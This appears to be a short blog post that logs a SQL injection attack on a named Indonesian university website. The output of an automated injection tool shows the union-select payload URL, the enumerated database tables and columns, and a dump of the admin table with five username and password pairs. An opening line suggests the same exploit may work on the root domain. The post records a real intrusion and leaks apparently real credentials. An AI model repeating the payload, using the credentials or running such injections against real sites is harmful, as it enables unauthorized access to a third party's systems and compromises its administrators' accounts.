I think it can be the exploit for the root domain, too.
[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Showing Tables & Columns from database "kemahasiswaan"
[+] 17:03:41
[+] Number of Tables: 7
[Database]: kemahasiswaan
[Table: Columns]
[0]admin: id_user,user,password,nama,status,level
[1]agenda: id_agenda,judul,tanggal,agenda_awal,agenda_akhir
[2]beasiswa: id_beasiswa,judul,tanggal,beasiswa
[3]berita: id_berita,judul,tanggal,berita_awal,berita_akhir
[4]level: id_level,level
[5]lowongan: id_lowongan,judul,tanggal,lowongan
[6]menu: id_menu
[-] [17:03:55]
[-] Total URL Requests 28
[-] Done
|---------------------------------------------------------------|
[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Dumping data from database "kemahasiswaan" Table "admin"
[+] Column(s) ['user', 'password']
[+] 17:04:14
[+] Number of Rows: 5
[0] athox:mayax:
[1] clock:defist:
[2] santoso:suga:
[3] heru:heru:
[4] jokosis:jokosis:
[-] [17:04:16]
[-] Total URL Requests 6
[-] Done
0 comments:
Post a Comment